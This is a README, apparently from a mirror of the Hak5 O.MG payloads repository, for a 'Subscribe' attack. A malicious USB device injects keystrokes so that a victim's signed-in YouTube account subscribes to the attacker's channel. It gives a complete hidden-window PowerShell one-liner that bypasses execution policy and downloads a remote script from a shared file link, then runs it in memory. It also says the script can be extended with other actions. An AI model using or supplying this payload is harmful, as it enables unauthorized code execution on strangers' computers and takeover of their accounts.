mirror of https://github.com/hak5/omg-payloads.git
259bc62d77 | ||
---|---|---|
.. | ||
README.md | ||
Subscribe-Execute.txt | ||
Subscribe.ps1 | ||
Subscribe.txt |
README.md
Table of Contents
Subscribe
A script I put together to make your target subscribe to your youtube channel
Description
This script is set to run with 2 different methods.
Either you use straight keystroke injection with no dependencies
Or you use an Invoke-WebRequest to download and execute a powershell script that will do the same thing
(With the powershell script you have the ability to modify it and add other actions)
Either way your target will be directed to your youtube page where they will be made to subscribe to you
Getting Started
Dependencies
- DropBox or other file hosting service - Your Shared link for the intended file
- Windows 10,11
- Your target will have to be signed into their youtube account
Executing program
- Plug in your device
- Either a straight keystroke injection will be used
- OR
- Invoke-WebRequest will be entered in the Run Box to download and execute the script from memory
powershell -w h -NoP -NonI -Exec Bypass $pl = iwr https:// < Your Shared link for the intended file> ?dl=1; invoke-expression $pl
Contributing
All contributors names will be listed here
I am Jakoby
Version History
- 0.1
- Initial Release
Contact
I am Jakoby
Project Link: [https://github.com/I-Am-Jakoby/hak5-submissions/tree/main/OMG/Payloads/OMG-Subscribe)